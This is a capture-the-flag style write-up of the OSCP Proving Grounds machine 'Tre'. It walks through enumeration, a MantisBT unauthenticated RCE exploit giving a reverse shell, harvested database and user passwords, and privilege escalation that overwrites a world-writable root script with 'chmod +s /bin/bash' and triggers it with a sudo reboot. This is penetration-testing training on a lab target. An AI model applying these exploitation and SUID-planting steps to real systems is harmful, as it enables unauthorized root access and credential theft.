OSCP - Proving Grounds - tre

Published: 2025-07-02

Key takeaways

  • There is more than one way to breach the perimeter
  • Read the pspy64 output carefully

Steps

As usual, start with an nmap scan: ports 22, 80 and 8082 are open.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-16 03:39 UTC
Nmap scan report for 192.168.56.84
Host is up (0.00083s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 99:1a:ea:d7:d7:b3:48:80:9f:88:82:2a:14:eb:5f:0e (RSA)
|   256 f4:f6:9c:db:cf:d4:df:6a:91:0a:81:05:de:fa:8d:f8 (ECDSA)
|_  256 ed:b9:a9:d7:2d:00:f8:1b:d3:99:d6:02:e5:ad:17:9f (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Tre
8082/tcp open  http    nginx 1.14.2
|_http-title: Tre
|_http-server-header: nginx/1.14.2
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Port 80 is where the information is; directory brute-forcing turns up quite a few hidden paths.

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.117.84/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   502,404,429,503,400
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/cms                  (Status: 301) [Size: 314] [--> http://192.168.117.84/cms/]
/mantisbt             (Status: 301) [Size: 319] [--> http://192.168.117.84/mantisbt/]
/server-status        (Status: 403) [Size: 279]
/system               (Status: 401) [Size: 461]
Progress: 20476 / 20477 (100.00%)
===============================================================
Finished
===============================================================

Searching for mantisbt turns up an unauthenticated RCE exploit (EDB 48818, which chains the password-reset account hijack CVE-2017-7615 with command execution through the admin dot_tool setting, CVE-2019-15715). There is no version information yet, so this is a try-and-see.

C:\home\kali\Documents\OFFSEC\play\Tre> searchsploit -m 48818          
  Exploit: Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)
      URL: https://www.exploit-db.com/exploits/48818
     Path: /usr/share/exploitdb/exploits/php/webapps/48818.py
    Codes: CVE-2019-15715, CVE-2017-7615
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Documents/OFFSEC/play/Tre/48818.py
                                                                                                                                                                                                                                              
C:\home\kali\Documents\OFFSEC\play\Tre> python2 48818.py
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Successfully hijacked account!
Successfully logged in!
Triggering reverse shell
Cleaning up
Deleting the dot_tool config.
Deleting the relationship_graph_enable config.
Successfully cleaned up

The local listener nc -nlvp 80 then receives the reverse shell (the exploit was run without arguments, so the target URL and callback host/port had been set inside the script beforehand).

C:\home\kali\Documents\OFFSEC\play\Tre> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.196] from (UNKNOWN) [192.168.117.84] 38846
bash: cannot set terminal process group (569): Inappropriate ioctl for device
bash: no job control in this shell
www-data@tre:/var/www/html/mantisbt$ 

Running pspy64 on the box shows root (UID=0) launching /bin/bash /usr/bin/check-system with a new PID roughly once per second, and the file is world-writable (-rw----rw-, no execute bit, which is why it is invoked through /bin/bash). The per-second entries are most likely the child processes bash forks for sleep 1, which pspy catches before the exec and which therefore still carry the parent's command line: the script itself (below) is one long-running loop, not a job restarted every second.

2024/12/16 07:47:15 CMD: UID=0    PID=1434   | /bin/bash /usr/bin/check-system 
2024/12/16 07:47:16 CMD: UID=0    PID=1436   | /bin/bash /usr/bin/check-system 
2024/12/16 07:47:17 CMD: UID=0    PID=1437   | /bin/bash /usr/bin/check-system 
2024/12/16 07:47:18 CMD: UID=0    PID=1438   | /bin/bash /usr/bin/check-system 
2024/12/16 07:47:19 CMD: UID=0    PID=1439   | /bin/bash /usr/bin/check-system 
2024/12/16 07:47:20 CMD: UID=0    PID=1440   | /bin/bash /usr/bin/check-system 
2024/12/16 07:47:21 CMD: UID=0    PID=1441   | /bin/bash /usr/bin/check-system 

......
......

www-data@tre:/var/www/html/mantisbt$ ls -l /usr/bin/check-system
ls -l /usr/bin/check-system
-rw----rw- 1 root root 135 May 12  2020 /usr/bin/check-system

www-data@tre:/var/www/html/mantisbt$ cat /usr/bin/check-system
cat /usr/bin/check-system
DATE=`date '+%Y-%m-%d %H:%M:%S'`
echo "Service started at ${DATE}" | systemd-cat -p info

while :
do
echo "Checking...";
sleep 1;
done

Overwrite it directly with a line that sets the SUID bit on /bin/bash. This does not work: /bin/bash stays non-SUID. The reason is that bash parses the whole while loop before executing it and then runs it from memory; the running instance never re-reads the file, so the new contents only execute the next time the script is started.

echo "chmod +s /bin/bash" > /usr/bin/check-system
cat /usr/bin/check-system
chmod +s /bin/bash
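The following is an added demonstration, not part of the original writeup, of why the overwrite above has no effect until the script is started again. It writes a stand-in for check-system (the same loop, output silenced) to a temp directory, starts it with bash the way the box does, replaces the file with a harmless payload that creates a marker file instead of running chmod +s /bin/bash, and checks that the running loop ignores the change while a fresh start executes it. The temp-dir paths and the marker payload are hypothetical.

```bash
#!/bin/sh
# Added demonstration (not from the original writeup): a running bash loop
# does not pick up changes to its own script file, but a fresh start does.
# The temp-dir paths and the "touch marker" payload are hypothetical stand-ins
# for /usr/bin/check-system and "chmod +s /bin/bash".

demo_dir=$(mktemp -d)
script="$demo_dir/check-system"
marker="$demo_dir/marker"
trap 'rm -rf "$demo_dir"' EXIT

# Stand-in for the original check-system loop (output silenced).
write_loop_script() {
    cat > "$script" <<'EOF'
while :
do
echo "Checking..." >/dev/null
sleep 1
done
EOF
}

# The overwrite from the writeup, with a harmless payload: create a marker file.
write_payload_script() {
    printf 'touch "%s"\n' "$marker" > "$script"
}

# Start the loop as the box does (bash <file>, no execute bit needed), then
# overwrite the file and watch for two seconds. Prints "stale" when the old
# loop is still running and the payload never executed, "fresh" otherwise.
observe_running_loop() {
    rm -f "$marker"
    write_loop_script
    bash "$script" >/dev/null 2>&1 &
    loop_pid=$!
    sleep 1                     # let bash parse the whole while-loop and start it
    write_payload_script        # same move as "echo ... > /usr/bin/check-system"
    sleep 2                     # a couple more iterations of the old loop
    if kill -0 "$loop_pid" 2>/dev/null && [ ! -e "$marker" ]; then
        result=stale
    else
        result=fresh
    fi
    kill "$loop_pid" 2>/dev/null || true
    wait "$loop_pid" 2>/dev/null || true
    echo "$result"
}

# A fresh invocation of the replaced file (what the reboot achieves via the
# systemd unit) runs the payload. Prints "fresh" when the marker appears.
observe_fresh_start() {
    rm -f "$marker"
    write_payload_script
    bash "$script"
    if [ -e "$marker" ]; then echo fresh; else echo stale; fi
}

echo "overwrite while running: $(observe_running_loop)"    # stale
echo "fresh start after overwrite: $(observe_fresh_start)" # fresh
```

The same holds for any interpreter that reads its whole compound command before running it, which is why the rest of this writeup has to find a way to restart the service rather than wait for the loop to notice the change.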


Uploading and running linpeas.sh turns up an interesting file, /var/www/html/mantisbt/config/config_inc.php, which contains the database username and password; they cannot be used to log in from the command line, though.


$g_hostname               = 'localhost';
$g_db_type                = 'mysqli';
$g_database_name          = 'mantis';
$g_db_username            = 'mantissuser';
$g_db_password            = 'password@123AS';

Looking around further, there is an adminer.php in the web root. The directory brute-force missed it, most likely a wordlist issue: the gobuster run used no -x php, so a .php file is only requested if the wordlist happens to contain the full filename.

drwxr-xr-x 16 www-data www-data  12288 Apr  1  2017 mantisbt
-rw-r--r--  1 www-data www-data 227984 Oct 24  2017 file.jpg
drwxr-xr-x  3 root     root       4096 May 12  2020 ..
-rw-r--r--  1 www-data www-data    164 May 12  2020 index.html
-rw-r--r--  1 root     root         20 May 12  2020 info.php
drwxr-xr-x 16 root     root      12288 May 12  2020 system
-rw-r--r--  1 root     root     489307 May 12  2020 adminer.php
drwxr-xr-x  5 www-data www-data   4096 May 12  2020 .
drwxr-xr-x  9 www-data www-data   4096 May 12  2020 cms
pwd
/var/www/html

Browsing to it shows Adminer, a web UI for MySQL. Logging in with the discovered mantissuser / password@123AS works. In mantis_user_table, the row for the user tre has a realname value that looks like a password, and the target conveniently has a local user named tre.

su tre with that value succeeds, and sudo -l shows the user can reboot the server without a password.

www-data@tre:/tmp$ su tre
su tre
Password: Tr3@123456A!

id
uid=1000(tre) gid=1000(tre) groups=1000(tre),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
sudo -l
Matching Defaults entries for tre on tre:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tre may run the following commands on tre:
    (ALL) NOPASSWD: /sbin/shutdown


Perhaps after a reboot the service that runs /usr/bin/check-system will start the script afresh and our change will take effect. Note that shutdown -r with no time argument schedules the reboot for one minute later.

sudo /sbin/shutdown -r
Shutdown scheduled for Mon 2024-12-16 08:03:36 EST, use 'shutdown -c' to cancel.

Session terminated, killing shell... ...killed.
bash: [1497: 2 (255)] tcsetattr: Inappropriate ioctl for device
www-data@tre:/var/www/html/mantisbt$ exit

After the server comes back up, repeat the same steps to get a reverse shell. /bin/bash now carries the SUID bit, and /bin/bash -p gives a root effective uid (the -p flag matters: without it bash resets the effective uid to the real uid when they differ). Privilege escalation succeeds.

C:\home\kali\Documents\OFFSEC\play\Tre> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.196] from (UNKNOWN) [192.168.117.84] 37042
bash: cannot set terminal process group (508): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.0$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash
bash-5.0$ /bin/bash -p
/bin/bash -p
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
cat /root/proof.txt
22f5d43e241d15a25e6d1eae87510c31
